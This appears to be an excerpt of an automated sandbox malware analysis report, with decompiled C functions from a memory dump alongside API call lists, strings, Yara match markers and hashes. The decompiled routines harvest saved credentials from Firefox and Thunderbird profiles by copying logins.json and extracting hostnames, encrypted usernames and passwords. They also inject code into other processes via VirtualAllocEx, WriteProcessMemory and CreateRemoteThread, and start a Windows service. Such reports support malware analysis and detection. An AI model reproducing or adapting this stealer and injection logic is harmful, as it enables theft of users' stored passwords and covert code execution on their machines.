                                  										_v56 = _t281;
                                  										E0040357C( &_v16, _t385, __eflags, L".tmp");
                                  										_t393 = _v16;
                                  										_t390 = _v20;
                                  										__eflags = CopyFileW(_v20, _t393, _t281);
                                  										if(__eflags != 0) {
                                  											E00403549( &_v20,  &_v16);
                                  											_t390 = _v20;
                                  										}
                                  										E004113ED( &_v184, __eflags);
                                  										_t325 =  &_v180;
                                  										E00403549(_t325,  &_v20);
                                  										_push(_t325);
                                  										_t207 = E004116B1( &_v184, 0xc0000000);
                                  										_t327 =  &_v184;
                                  										__eflags = _t207;
                                  										if(__eflags != 0) {
                                  											_v52 = _t281;
                                  											_v48 = _t281;
                                  											E0041135C( &_v184, _t385,  &_v52, _v164, _t281);
                                  											_t215 = E004034D1( &_v116, "encryptedUsername");
                                  											_t217 = E0040305D( &_v52,  &_v160);
                                  											_t385 = _t215;
                                  											_t283 = E0040961C(_t217, _t215, __eflags);
                                  											_v120 = _t283;
                                  											E00405FEB(_v160);
                                  											_t336 = _v116;
                                  											E00405FEB(_v116);
                                  											__eflags = _t283;
                                  											if(_t283 == 0) {
                                  												_t281 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												_t391 = _v32;
                                  												_t281 = 0;
                                  												__eflags = 0;
                                  												_t394 = _v120;
                                  												do {
                                  													_v112 = 0;
                                  													_v108 = 0;
                                  													_v104 = 0;
                                  													_t230 = E004034D1( &_v128, "hostname");
                                  													E00409655( &_v88, E0040305D( &_v52,  &_v124), __eflags, _t230, _t394);
                                  													E00405FEB(_v124);
                                  													E00405FEB(_v128);
                                  													_t236 = E004034D1( &_v136, "encryptedUsername");
                                  													E00409655( &_v84, E0040305D( &_v52,  &_v132), __eflags, _t236, _t394);
                                  													E00405FEB(_v132);
                                  													E00405FEB(_v136);
                                  													_t242 = E004034D1( &_v144, "encryptedPassword");
                                  													_t385 = E0040305D( &_v52,  &_v140);
                                  													E00409655( &_v80, _t244, __eflags, _t242, _t394);
                                  													E00405FEB(_v140);
                                  													E00405FEB(_v144);
                                  													E0040A8C3(_t391, __eflags, _v84,  &_v72);
                                  													E0040A8C3(_t391, __eflags, _v80,  &_v76);
                                  													E00403549( &_v112, E004031AF( &_v88, __eflags,  &_v60));
                                  													E00405FEB(_v60);
                                  													_v60 = 0;
                                  													E00403549( &_v108, E004031AF(E004034D1( &_v148, _v72), __eflags,  &_v64));
                                  													E00405FEB(_v64);
                                  													_v64 = 0;
                                  													E00405FEB(_v148);
                                  													E00403549( &_v104, E004031AF(E004034D1( &_v152, _v76), __eflags,  &_v68));
                                  													E00405FEB(_v68);
                                  													_v68 = 0;
                                  													E00405FEB(_v152);
                                  													_t396 = _t396 - 0x10;
                                  													_v100 = 0;
                                  													E00401FF2(_t396,  &_v112);
                                  													E00402028(_t391);
                                  													E00405FEB(_v72);
                                  													E00405FEB(_v76);
                                  													E00405FEB(_v80);
                                  													E00405FEB(_v84);
                                  													E00405FEB(_v88);
                                  													_t336 =  &_v112;
                                  													E00401441( &_v112);
                                  													_t394 = _t394 - 1;
                                  													__eflags = _t394;
                                  												} while (_t394 != 0);
                                  												_t393 = _v16;
                                  												_t390 = _v20;
                                  											}
                                  											_t221 = PathFileExistsW(_t393);
                                  											__eflags = _t221;
                                  											if(_t221 != 0) {
                                  												E0040373F(_t396,  &_v16);
                                  												E0041142A(_t336);
                                  											}
                                  											 *((intOrPtr*)(_v32 + 0x84))(_v156);
                                  											 *((intOrPtr*)(_v32 + 0x6c))();
                                  											E00403148( &_v52);
                                  											_t327 =  &_v184;
                                  										}
                                  										E0041140C(_t327, __eflags);
                                  										E00405FEB(_t393);
                                  										_v16 = _t281;
                                  										E00405FEB(_t390);
                                  										_v20 = _t281;
                                  										E00405FEB(_v28);
                                  										E00405FEB(_v12);
                                  										_t389 = _v40;
                                  										_t392 = _v32;
                                  									}
                                  								}
                                  							} else {
                                  								L7:
                                  								E00405FEB(_v28);
                                  								E00405FEB(_v12);
                                  							}
                                  							_v12 = _t281;
                                  						}
                                  						E0040B10E(_t392);
                                  						_t281 = 1;
                                  						E00405FEB(_v36);
                                  					}
                                  					E00405FEB(_v44);
                                  				}
                                  				E00405FEB(_v24);
                                  				E00405FEB(_a4);
                                  				return _t281;
                                   			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • lstrcatW.KERNEL32 ref: 0040A3F1
                                  • GetBinaryTypeW.KERNEL32 ref: 0040A402
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A882
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040A579
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                  • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                  • API String ID: 288196626-815594582
                                  • Opcode ID: 6a137c3a8becdf846506f2e7c12f3be83cd2cbae3dacaf2288c82b898041fd66
                                  • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                  • Opcode Fuzzy Hash: 6a137c3a8becdf846506f2e7c12f3be83cd2cbae3dacaf2288c82b898041fd66
                                  • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00409E2D(intOrPtr __ecx, void* __eflags, char _a4) {
                                  				int _v12;
                                  				int _v16;
                                  				WCHAR* _v20;
                                  				WCHAR* _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				int _v48;
                                  				int _v52;
                                  				long _v56;
                                  				int _v60;
                                  				int _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				intOrPtr _v88;
                                  				char _v92;
                                  				char _v96;
                                  				char _v100;
                                  				void* _v104;
                                  				int _v108;
                                  				char _v112;
                                  				char _v116;
                                  				char _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				int _v152;
                                  				long _v156;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v180;
                                  				char _v184;
                                  				short _v704;
                                  				short _v1224;
                                  				long _t171;
                                  				int _t182;
                                  				int _t183;
                                  				int _t186;
                                  				int _t200;
                                  				WCHAR* _t208;
                                  				void* _t210;
                                  				int _t214;
                                  				void* _t223;
                                  				void* _t229;
                                  				void* _t235;
                                  				int _t279;
                                  				int _t281;
                                  				char* _t321;
                                  				void* _t382;
                                  				intOrPtr _t385;
                                  				intOrPtr _t387;
                                  				WCHAR* _t392;
                                  				int _t393;
                                  				void* _t394;
                                  				void* _t395;
                                  				void* _t396;
                                  
                                  				_t396 = __eflags;
                                  				_t385 = __ecx;
                                  				_v32 = __ecx;
                                  				E004036F7( &_v24, L"Profile");
                                  				_t279 = 0;
                                  				E00401052( &_v1224, 0, 0x208);
                                  				_v56 = 0;
                                  				_v156 = 0;
                                  				E00401052( &_v704, 0, 0x104);
                                  				_t395 = _t394 + 0x14;
                                  				_t381 =  &_v704;
                                  				E0040B87D(L"thunderbird.exe",  &_v704, _t396);
                                  				E004036F7( &_v44,  &_v704);
                                  				GetBinaryTypeW( &_v704,  &_v156);
                                  				E0040373F(_t395,  &_v44);
                                  				_t289 = _t385;
                                  				if(E0040ADE3(_t385,  &_v704,  &_v44) != 0) {
                                  					L3:
                                  					E0040357C( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                  					E0040373F( &_v36,  &_a4);
                                  					E0040357C( &_v36, _t381, __eflags, L"profiles.ini");
                                  					E00403549( &_v24, E004036F7( &_v40, L"Profile"));
                                  					E00405FEB(_v40);
                                  					E00403384( &_v24, _t381, __eflags, _t279);
                                  					_push(_v36);
                                  					_push(0x104);
                                  					while(1) {
                                  						_t389 = _v24;
                                  						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                  						__eflags = _t171;
                                  						if(_t171 == 0) {
                                  							break;
                                  						}
                                  						_v56 = _v56 + 1;
                                  						E00403549( &_v24, E004036F7( &_v60, L"Profile"));
                                  						E00405FEB(_v60);
                                  						_v60 = _t279;
                                  						E00403384( &_v24, _t381, __eflags, _v56 + 1);
                                  						E0040373F( &_v12,  &_a4);
                                  						E0040357C( &_v12, _t381, __eflags,  &_v1224);
                                  						E00403666( &_v12,  &_v28);
                                  						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
                                  						__eflags = _t182;
                                  						if(_t182 == 0) {
                                  							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
                                  							_v152 = _t183;
                                  							__eflags = _t183;
                                  							if(_t183 == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
                                  								_t395 = _t395 + 0xc;
                                  								__eflags = _t186;
                                  								if(_t186 != 0) {
                                  									goto L5;
                                  								} else {
                                  									E0040373F( &_v20,  &_v12);
                                  									E0040357C( &_v20, _t381, __eflags, L"\\logins.json");
                                  									_t382 = 0x1a;
                                  									E00410C8A( &_v16, _t382, __eflags);
                                  									E0040357C( &_v16, _t382, __eflags, "\\");
                                  									_t381 = 8;
                                  									E00403447( &_v16, __eflags, E004035B9( &_v64, _t381, __eflags));
                                  									E00405FEB(_v64);
                                  									_v64 = _t279;
                                  									E0040357C( &_v16, _t381, __eflags, L".tmp");
                                  									_t392 = _v16;
                                  									_t386 = _v20;
                                  									__eflags = CopyFileW(_v20, _t392, _t279);
                                  									if(__eflags != 0) {
                                  										E00403549( &_v20,  &_v16);
                                  										_t386 = _v20;
                                  									}
                                  									E004113ED( &_v184, __eflags);
                                  									_t321 =  &_v180;
                                  									E00403549(_t321,  &_v20);
                                  									_push(_t321);
                                  									_t200 = E004116B1( &_v184, 0xc0000000);
                                  									_t323 =  &_v184;
                                  									__eflags = _t200;
                                  									if(__eflags != 0) {
                                  										_v52 = _t279;
                                  										_v48 = _t279;
                                  										E0041135C( &_v184, _t381,  &_v52, _v164, _t279);
                                  										_t208 = E004034D1( &_v104, "encryptedUsername");
                                  										_t210 = E0040305D( &_v52,  &_v160);
                                  										_t381 = _t208;
                                  										_t281 = E0040961C(_t210, _t208, __eflags);
                                  										_v108 = _t281;
                                  										E00405FEB(_v160);
                                  										_t332 = _v104;
                                  										E00405FEB(_v104);
                                  										__eflags = _t281;
                                  										if(_t281 == 0) {
                                  											_t279 = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											_t387 = _v32;
                                  											_t279 = 0;
                                  											__eflags = 0;
                                  											_t393 = _v108;
                                  											do {
                                  												_v100 = 0;
                                  												_v96 = 0;
                                  												_v92 = 0;
                                  												_t223 = E004034D1( &_v116, "hostname");
                                  												E00409655( &_v40, E0040305D( &_v52,  &_v112), __eflags, _t223, _t393);
                                  												E00405FEB(_v112);
                                  												E00405FEB(_v116);
                                  												_t229 = E004034D1( &_v124, "encryptedUsername");
                                  												E00409655( &_v84, E0040305D( &_v52,  &_v120), __eflags, _t229, _t393);
                                  												E00405FEB(_v120);
                                  												E00405FEB(_v124);
                                  												_t235 = E004034D1( &_v132, "encryptedPassword");
                                  												_t381 = E0040305D( &_v52,  &_v128);
                                  												E00409655( &_v80, _t237, __eflags, _t235, _t393);
                                  												E00405FEB(_v128);
                                  												E00405FEB(_v132);
                                  												E0040A8C3(_t387, __eflags, _v84,  &_v136);
                                  												E0040A8C3(_t387, __eflags, _v80,  &_v144);
                                  												E00403549( &_v100, E004031AF( &_v40, __eflags,  &_v68));
                                  												E00405FEB(_v68);
                                  												_v68 = 0;
                                  												E00403549( &_v96, E004031AF(E004034D1( &_v140, _v136), __eflags,  &_v72));
                                  												E00405FEB(_v72);
                                  												_v72 = 0;
                                  												E00405FEB(_v140);
                                  												E00403549( &_v92, E004031AF(E004034D1( &_v148, _v144), __eflags,  &_v76));
                                  												E00405FEB(_v76);
                                  												_v76 = 0;
                                  												E00405FEB(_v148);
                                  												_t395 = _t395 - 0x10;
                                  												_v88 = 4;
                                  												E00401FF2(_t395,  &_v100);
                                  												E00402028(_t387);
                                  												E00405FEB(_v80);
                                  												E00405FEB(_v84);
                                  												E00405FEB(_v40);
                                  												_t332 =  &_v100;
                                  												E00401441( &_v100);
                                  												_t393 = _t393 - 1;
                                  												__eflags = _t393;
                                  											} while (_t393 != 0);
                                  											_t392 = _v16;
                                  											_t386 = _v20;
                                  										}
                                  										_t214 = PathFileExistsW(_t392);
                                  										__eflags = _t214;
                                  										if(_t214 != 0) {
                                  											E0040373F(_t395,  &_v16);
                                  											E0041142A(_t332);
                                  										}
                                  										 *((intOrPtr*)(_v32 + 0x84))(_v152);
                                  										 *((intOrPtr*)(_v32 + 0x6c))();
                                  										E00403148( &_v52);
                                  										_t323 =  &_v184;
                                  									}
                                  									E0041140C(_t323, __eflags);
                                  									E00405FEB(_t392);
                                  									_v16 = _t279;
                                  									E00405FEB(_t386);
                                  									_v20 = _t279;
                                  									E00405FEB(_v28);
                                  									E00405FEB(_v12);
                                  									_t385 = _v32;
                                  								}
                                  							}
                                  						} else {
                                  							L5:
                                  							E00405FEB(_v28);
                                  							E00405FEB(_v12);
                                  						}
                                  						_push(_v36);
                                  						_v12 = _t279;
                                  						_push(0x104);
                                  					}
                                  					E0040AD8C(_t385);
                                  					_t279 = 1;
                                  					__eflags = 1;
                                  					E00405FEB(_v36);
                                  				} else {
                                  					E0040373F(_t395,  &_v44);
                                  					if(E0040ADE3(_t385,  &_v704, _t289) != 0) {
                                  						goto L3;
                                  					} else {
                                  						_t389 = _v24;
                                  					}
                                  				}
                                  				E00405FEB(_v44);
                                  				E00405FEB(_t389);
                                  				E00405FEB(_a4);
                                  				return _t279;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • GetBinaryTypeW.KERNEL32 ref: 00409EAC
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A32F
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                  • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                  • API String ID: 1065485167-1863067114
                                  • Opcode ID: 20fbf8cb5b50b562a7e5f6588e131815664c5ee6ddbea8753ef69d7b4fa44e2f
                                  • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                  • Opcode Fuzzy Hash: 20fbf8cb5b50b562a7e5f6588e131815664c5ee6ddbea8753ef69d7b4fa44e2f
                                  • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00407B2E(long _a12) {
                                  				long _v8;
                                  				long _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				long _v24;
                                  				signed int _t33;
                                  				void* _t37;
                                  				void* _t40;
                                  				long _t49;
                                  				_Unknown_base(*)()* _t64;
                                  				SIZE_T* _t69;
                                  				void* _t76;
                                  				void* _t80;
                                  				void* _t87;
                                  				void* _t91;
                                  
                                  				if( *0x426754 == 0) {
                                  					 *0x426754 = E0040FB98() != 0;
                                  				}
                                  				_t33 = OpenProcess(0x1fffff, 0, _a12);
                                  				_t91 = _t33;
                                  				if(_t91 != 0) {
                                  					_v12 = GetCurrentProcess();
                                  					if(E004121DC( &_v12) == 0) {
                                  						L15:
                                  						_t64 = VirtualAllocEx(_t91, 0, 0x100000, 0x3000, 0x40);
                                  						if(_t64 == 0) {
                                  							L23:
                                  							_push(0xfffffffe);
                                  							L24:
                                  							_pop(_t37);
                                  							return _t37;
                                  						}
                                  						_v24 = _v24 & 0x00000000;
                                  						VirtualProtectEx(_t91, _t64, 0x100000, 0x40,  &_v24);
                                  						_t40 = VirtualAllocEx(_t91, 0x33370000, 0x100, 0x3000, 0x40);
                                  						_v20 = _t40;
                                  						if(_t40 == 0) {
                                  							goto L23;
                                  						}
                                  						_v8 = _v8 & 0x00000000;
                                  						_t87 = "XXXXXX";
                                  						if(WriteProcessMemory(_t91, _v20, _t87, E00401133(_t87),  &_v8) == 0 || _v8 != E00401133(_t87)) {
                                  							L22:
                                  							_push(0xfffffffd);
                                  							goto L24;
                                  						} else {
                                  							_v12 = 0;
                                  							if(WriteProcessMemory(_t91, _t64, 0x41e6c0, 0x1d44,  &_v12) == 0 || _v12 != 0x1d44) {
                                  								goto L22;
                                  							} else {
                                  								return CreateRemoteThread(_t91, 0, 0, _t64, 0, 0, 0);
                                  							}
                                  						}
                                  					}
                                  					_t69 =  &_v12;
                                  					_v12 = _t91;
                                  					if(E004121DC(_t69) != 0) {
                                  						goto L15;
                                  					}
                                  					_push(_t69);
                                  					_push(_t69);
                                  					_t49 = E0040FBB4(_t91, 0x100000, 0, 0);
                                  					_v24 = _t49;
                                  					if(_t49 != 0 || 0x100000 != 0) {
                                  						_v12 = 0;
                                  						E0040FD0D(_t91, 0x100000, _t49, 0x100000,  &_v12,  &_v12);
                                  						_t76 = E0040FBB4(_t91, 0x100, 0x33370000, 0);
                                  						_v20 = _t76;
                                  						_v16 = 0x100;
                                  						if(_t76 != 0 || 0x100 != 0) {
                                  							_v8 = 0;
                                  							if(E0040FAE9(_t91, "XXXXXX", _v20, _v16, E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
                                  								goto L22;
                                  							} else {
                                  								_t90 = _v24;
                                  								_v8 = _v8 & 0x00000000;
                                  								_t80 = _t91;
                                  								if(E0040FAE9(_t80, 0x41c2a8, _v24, 0x100000, 0x2412,  &_v8) == 0 || _v8 != 0x2412) {
                                  									goto L22;
                                  								} else {
                                  									MessageBoxA(0, "Injecting64", "Debug", 0);
                                  									_push(_t80);
                                  									_push(_t80);
                                  									asm("cdq");
                                  									return E0040FC62(0x41c2a8, _t91, 0x41c2a8, _t90, 0x100000);
                                  								}
                                  							}
                                  						} else {
                                  							goto L23;
                                  						}
                                  					} else {
                                  						goto L23;
                                  					}
                                  				} else {
                                  					return _t33 | 0xffffffff;
                                  				}
                                  			}

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                    • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                    • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  • MessageBoxA.USER32 ref: 00407C7D
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                  • String ID: Debug$Injecting64$XXXXXX
                                  • API String ID: 1574360354-2389424830
                                  • Opcode ID: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction ID: d433ea0d1c2d4f6ec0602b92d9002377d3576233aac0b38f39bcf27655b0c8a4
                                  • Opcode Fuzzy Hash: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction Fuzzy Hash: 21519271E04205BBEB21A7618C45FBF7A7DEF85714F20417EF500B22D0E7B8AA45866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00413F7F(long __edx) {
                                  				void* _v8;
                                  				long _v12;
                                  				char _v268;
                                  				void _v272;
                                  				void* _t25;
                                  				void* _t27;
                                  				void* _t33;
                                  				void* _t37;
                                  
                                  				_t33 = OpenProcess(0x1fffff, 0, __edx);
                                  				_v8 = _t33;
                                  				_v272 = GetCurrentProcessId();
                                  				_t35 = E00401085(0xff);
                                  				GetModuleFileNameA(0, _t13, 0xff);
                                  				E004011A4( &_v268, _t35);
                                  				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
                                  				WriteProcessMemory(_t33, _t27,  &E00426208, 0x800, 0);
                                  				_t5 =  &_v8; // 0x413f7a
                                  				VirtualProtectEx( *_t5, _t27, 0x800, 0x40,  &_v12);
                                  				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
                                  				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                  				_t9 = _t27 + 0x10e; // 0x10e
                                  				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
                                  				 *0x559cb4 = _t25;
                                  				return _t25;
                                  			}

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,74A313FB,00000000), ref: 00413F93
                                  • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                  • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                  • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                  • String ID: z?A
                                  • API String ID: 900395357-4280446894
                                  • Opcode ID: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction ID: b1c18d8d0f2f4188799d6c91686f228e56c1b6c845ed563d7edeb039f8378cf2
                                  • Opcode Fuzzy Hash: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction Fuzzy Hash: A1216F71644218BEF7209B51DC4AFEB7F7CEB44720F2041B6B604AA0D0DAF46E408AA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D3A8(short** _a4) {
                                  				void* _t2;
                                  				int _t8;
                                  				void* _t13;
                                  				int _t15;
                                  				void* _t17;
                                  
                                  				_t15 = 0;
                                  				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                  				_t17 = _t2;
                                  				if(_t17 != 0) {
                                  					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                  					if(_t13 != 0) {
                                  						if(StartServiceW(_t13, 0, 0) != 0) {
                                  							L6:
                                  							_t15 = 1;
                                  							L7:
                                  							CloseServiceHandle(_t17);
                                  							CloseServiceHandle(_t13);
                                  							_t8 = _t15;
                                  							L8:
                                  							return _t8;
                                  						}
                                  						if(GetLastError() != 0x420) {
                                  							goto L7;
                                  						}
                                  						Sleep(0x7d0);
                                  						if(StartServiceW(_t13, 0, 0) == 0) {
                                  							goto L7;
                                  						}
                                  						goto L6;
                                  					}
                                  					CloseServiceHandle(_t17);
                                  					_t8 = 0;
                                  					goto L8;
                                  				}
                                  				return _t2;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                  • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
